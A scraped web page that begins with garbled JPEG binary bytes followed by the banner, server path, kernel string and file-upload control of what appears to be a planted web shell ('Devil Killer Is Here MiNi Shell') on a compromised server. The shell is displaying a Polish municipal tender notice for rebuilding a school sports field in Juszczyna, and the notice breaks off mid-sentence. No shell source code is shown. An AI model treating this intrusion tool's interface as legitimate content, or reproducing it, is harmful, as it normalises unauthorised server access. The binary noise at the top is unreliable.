JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210819/0015478701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa boiska przy Zespole Szkolno-Przedszkolnym w Juszczynie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Radziechowy-Wieprz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 072182670</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wieprz 700</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radziechowy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-381</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">338676610</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">338676613</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@radziechowy-wieprz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.radziechowy-wieprz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa boiska przy Zespole Szkolno-Przedszkolnym w Juszczynie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-79216211-00ee-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00154787</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003538/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Przebudowa boiska sportowego w miejscowości Juszczyna</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.radziechowy-wieprz.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.bip.radziechowy-wieprz.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w<br/>szczególności składanie oświadczeń, wniosków (innych niż wskazanych w pkt II), zawiadomień oraz<br/>przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza<br/>dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). We<br/>wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują<br/>się numerem ogłoszenia (BZP lub ID postępowania). 2. Zamawiający może również komunikować się<br/>z<br/>Wykonawcami za pomocą poczty elektronicznej, email ug@radziechowy-wieprz.pl lub<br/>ipieronek@radziechowy-wieprz.pl. Maksymalny rozmiar plików przesyłanych za pośrednictwem<br/>dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji<br/>wynosi 150 MB. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się<br/>datę ich przekazania na ePUAP. Zamawiający przekazuje link do postępowania w niniejszej SWZ (opis<br/>sposobu przygotowania oferty) Dane postępowanie można wyszukać również na Liście wszystkich<br/>postępowań klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki<br/>Postępowania na miniPortalu.W celu korzystania z systemu miniPortal konieczne jest dysponowanie<br/>przez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet. Aplikacja działa na<br/>Platformie Windows, Mac i Linux. Specyfikacja połączenia, formatu przesyłanych danych oraz<br/>kodowania i oznaczania czasu odbioru danych:- specyfikacja połączenia - Formularze udostępnione są<br/>za pomocą protokołu TLS 1.2, - format danych oraz kodowanie miniPortal - Formularze dostępne są w<br/>formacie HTML z kodowaniem UTF-8, - oznaczenia czasu odbioru danych – miniPortal - wszelkie<br/>operacje opierają się o czas serwera i dane zapisywane są z dokładnością co do setnej części<br/>sekundy, Integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego<br/>mechanizmu ePUAP. W przypadku Wykonawcy wysyłającego wniosek do Zamawiającego, ESP<br/>Zamawiającego automatycznie generuje Rodzaj Urzędowego Poświadczenia Odbioru czyli Urzędowe<br/>Poświadczenie Przedłożenia (UPP), które jest powiązane z wysyłanym dokumentem. W UPP w sekcji<br/>„Dane poświadczenia” jest zawarta informacja o dacie doręczenia.System dostępny jest za<br/>pośrednictwem następujących przeglądarek internetowych: Microsoft Internet Explorer od wersji 11.0 Mozilla Firefox od wersji 15 Google Chrome od wersji 20 Microsoft Edge</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych obowiązanym do<br/>spełnienia obowiązku informacyjnego z art. 13 RODO jest w szczególności:1) Zamawiający -<br/>względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał. Dotyczy to w<br/>szczególności:a) wykonawcy będącego osobą fizyczną,b) wykonawcy będącego osobą fizyczną,<br/>prowadzącą jednoosobową działalność gospodarczą,c) pełnomocnika wykonawcy będącego osobą<br/>fizyczną (np. dane osobowe zamieszczone w pełnomocnictwie),d) członka organu zarządzającego<br/>wykonawcy, będącego osobą fizyczną (np. dane osobowe zamieszczone w informacji z KRK),2)<br/>Wykonawca - względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał. Dotyczy<br/>to w szczególności:a) osoby fizycznej skierowanej do realizacji zamówienia,b)<br/>podwykonawcy/podmiotu trzeciego będącego osobą fizyczną,c) podwykonawcy/podmiotu trzeciego<br/>będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą,d) pełnomocnika<br/>podwykonawcy/podmiotu trzeciego będącego osobą fizyczną (np. dane osobowe zamieszczone w<br/>pełnomocnictwie),e) członka organu zarządzającego podwykonawcy/podmiotu trzeciego, będącego<br/>osobą fizyczną (np. dane osobowe zamieszczone w informacji z KRK);3) Podwykonawca/podmiot<br/>trzeci - względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał. Dotyczy to w<br/>szczególności osoby fizycznej skierowanej do realizacji zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR.271.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy opis przedmiotu zamówienia zawierają: Dokumentacja techniczna, stanowiące załącznik nr 1 do niniejszej SIWZ.<br/><br/>UWAGA! Dokumentacja projektowa zakłada wykonanie boiska z nawierzchnią poliuretanową typu natrysk. Zapis „systemu nawierzchni z trawy syntetycznej i wypełnienia” użyty na stronie 20 STWIORB jest omyłkowy, przedstawione wymagania dotyczą projektowanej nawierzchni poliuretanowej.<br/><br/>Wykonanie bieżni wchodzi w zakres zamówienia.<br/><br/>Utylizacja nawierzchni wchodzi w zakres zamówienia. Kwoty widoczne w przedmiarze jako koszty utylizacji nawierzchni są założeniem przy sporządzaniu kosztorysu inwestorskiego, Wykonawca ma obowiązek własnej kalkulacji kosztów utylizacji!<br/><br/>W pozycji przedmiaru nr. 1.7 powinna być informacja „krotność 2”. Do kalkulacji należy uwzględnić korytowanie na głębokość 20 cm.<br/><br/>Zamawiający wymaga wykonania wierzchniej warstwy pu zgodnie z technologią przy użyciu granulatu EPDM z pierwotnej produkcji i nie dopuszcza stosowania barwionych granulatów z recyklingu.<br/><br/>Należy przyjąć kolorystykę boisk zgodnie z dokumentacją projektową tj. w kolorze ceglastym i zielonym.<br/><br/>Zamawiający oświadcza, iż nie jest mu znany fakt występowania na terenie robót innych sieci lub kolizji z innymi sieciami.<br/><br/>Zamawiający informuje, iż oprócz nawierzchni i norm opisanych w dokumentacji technicznej, dopuści również nawierzchnię syntetyczną poliuretanową, spełniającą wymagania normy PN-EN 14877:2014-02.<br/><br/><br/>Szczegółowy sposób realizacji przedmiotu zamówienia określa załącznik nr 2 do niniejszej SIWZ – wzór umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112210-0 - Usuwanie wierzchniej warstwy gleby</p> <p class="mb-0">45212221-1 - Roboty budowlane związane z obiektami na terenach sportowych</p> <p class="mb-0">45223100-7 - Montaż konstrukcji metalowych</p> <p class="mb-0">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert i wyborze najkorzystniejszej oferty zamawiający będzie<br/>się kierował następującymi kryteriami:<br/>1. Cena – 60%, <br/>2. Okres gwarancji i rękojmi - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>posiadają doświadczenie niezbędne do wykonania przedmiotu zamówienia tj. udokumentują, iż<br/>w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie, zgodnie ze sztuką budowlaną i<br/>prawidłowo ukończyli co najmniej jedną robotę budowlaną polegającą na wykonaniu budowy,<br/>przebudowy lub remontu budowli sportowej, o wartości robót brutto minimum 300.000,00 zł. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o spełnianiu warunków udziałów w postępowaniu, o których<br/>mowa w pkt 5.2.1 i SWZ - sporządzone wg załącznika nr 3 do niniejszej SWZ<br/>Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących oświadczeń<br/>lub dokumentów:<br/>a) wykaz robót budowlanych wykonanych lub wykonywanych w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których roboty te zostały<br/>wykonane oraz dowodów określających, czy te roboty zostały wykonane należycie, przy czym<br/>dowodami są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w<br/>stanie uzyskać tych dokumentów – oświadczenie wykonawcy – w zakresie niezbędnym do wykazania<br/>spełniania warunków udziału w postępowaniu.<br/>Wykonawca winien sporządzić dokument wg wzoru stanowiącego załącznik nr 7 do SIWZ.<br/>UWAGA: Wykonawca nie jest obowiązany do złożenia oświadczeń lub dokumentów potwierdzających<br/>okoliczności, o których mowa w punkcie 6.4.2 lit. b), jeżeli Inwestycja realizowana była przez<br/>Zamawiającego i Zamawiający posiada oświadczenia lub dokumenty dotyczące tego Wykonawcy, o ile<br/>są one aktualne i zostały wskazane przez Wykonawcę w wykazie stanowiącym załącznik nr 9 do<br/>niniejszej SIWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">oświadczenie o braku podstaw do wykluczenia na podstawie w art. 108 ust. 1 ustawy Pzp spełnianiu<br/>warunków udziałów w postępowaniu – sporządzone wg załącznika nr 3 do niniejszej SWZ,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> PRZEDMIOTWE ŚRODKI DOWODOWE: oświadczenia lub dokumenty potwierdzające<br/>spełnianie warunków jakościowych, dotyczące systemu nawierzchni:<br/>1. Certyfikat IAAF dla produktu<br/>2. Atest Higieniczny PZH<br/>3. Aktualne badania oferowanej nawierzchni wykonane przez laboratorium posiadające<br/>akredytację IAAF, potwierdzające parametry techniczne nawierzchni<br/>4. Aktualne badania na zgodność z normą PN-EN 14877 potwierdzające parametry techniczne<br/>nawierzchni<br/>5. Autoryzacja producenta systemu poliuretanowego dla Wykonawcy na przedmiotową<br/>inwestycję, wraz z potwierdzeniem gwarancji<br/>6. Karta techniczna systemu<br/>7. Badania na zawartość pierwiastków śladowych wydane przez akredytowaną jednostkę<br/>8. Raport z badania na zawartość WWA<br/>W przypadku nawierzchni syntetycznej poliuretanowej, spełniającej wymagania normy PN-EN<br/>14877:2014-02, należy przedłożyć przy ofercie następujące dokumenty:<br/>- Certyfikat IAAF (Product Certificate)<br/>- Kompletny raport z badań niezależnego laboratorium wydany celem uzyskania Certyfikatu<br/>IAAF (Produkt Certificate)<br/>- Wyniki badań na zgodność z normą PN-EN 14877:2014-02 (obowiązujące w UE parametry nawierzchni pu)<br/>- Wyniki badań na zgodność z normą DIN 18035-6:2014 (bezpieczeństwo ekologiczne –<br/>zawartość związków chemicznych)<br/>- Raport z badań WWA <br/>- Atest higieniczny PZH<br/>- Karta techniczna potwierdzona przez producenta<br/>- Autoryzacja producenta systemu poliuretanowego dla Wykonawcy na przedmiotową<br/>inwestycję, wraz z potwierdzeniem gwarancji.<br/>UWAGA! Zamawiający nie przewiduje możliwości uzupełnienia przedmiotowych środków<br/>dowodowych, jeśli Wykonawca nie złoży ich z ofertą, lub jeśli złożone przedmiotowe środki<br/>dowodowe są niekompletne. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 6.3. DOKUMENTY, KTÓRE WSZYSCY WYKONAWCY MUSZĄ ZŁOŻYĆ DO OFERTY:<br/>1) wypełniony Formularz ofertowy, stanowiący załącznik nr 6 do niniejszej specyfikacji;<br/>2) wypełniony załącznik nr 3 do SIWZ, stanowiący oświadczenie wykonawcy dotyczące<br/>przesłanek wykluczenia z postępowania, o którym mowa w punkcie 5.1. SIWZ;<br/>3) wypełniony załącznik nr 3 do SIWZ, stanowiący oświadczenie wykonawcy dotyczące<br/>spełniania warunków udziału w postępowaniu, o których mowa w punkcie 5.2. SIWZ;<br/>4) PRZEDMIOTWE ŚRODKI DOWODOWE<br/>5) pełnomocnictwo ustanowione do reprezentowania wykonawców ubiegających się o udzielenie<br/>zamówienia publicznego. Jeżeli osoba/osoby podpisujące ofertę działa/ją na podstawie<br/>pełnomocnictwa, to pełnomocnictwo to musi w swej treści jednoznacznie wskazywać<br/>uprawnienie do podpisania oferty. Pełnomocnictwo to powinno zostać dołączone do oferty i musi<br/>być złożone w oryginale bądź w formie notarialnie uwierzytelnionej kopii. Pełnomocnictwo nie<br/>jest wymagane, jeśli podpisujący jest lub są właścicielami firmy lub jeśli są wymienieni z<br/>nazwiska w odnośnym dokumencie rejestrowym.<br/>Wykonawca musi udokumentować – przy ofercie – że pełnomocnictwo ustanowione do jego<br/>reprezentacji zostało podpisane przez osobę/y uprawnione do działania w jego imieniu;<br/>6) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>7) Zobowiązanie podmiotu udostępniającego zasoby potwierdza, że stosunek łączący<br/>wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych<br/>zasobów oraz określa w szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>Wykonawca winien sporządzić dokument wg wzoru stanowiącego załącznik nr 4 do SIWZ.<br/>8) Wykonawca, który powołuje się na rozwiązania równoważne zobowiązany jest załączyć do<br/>oferty: wykaz materiałów/urządzeń/wyrobów równoważnych przyjętych do kalkulacji ceny oferty<br/>oraz stosowne dokumenty potwierdzające, że zaoferowane materiały/urządzenia/wyroby<br/>zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji echnicznej. Poprzez dokumentację potwierdzającą dotyczącą minimalnych wymagań<br/>parametrów jakościowych, Zamawiający rozumie wymagania towarów zawarte w ogólnie<br/>dostępnych źródłach, katalogach, stronach internetowych producentów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Warunkiem udziału Wykonawcy w postępowaniu jest wniesienie wadium w wysokości 5.000 zł<br/>(słownie: pięć tysięcy złotych). <br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu; <br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść 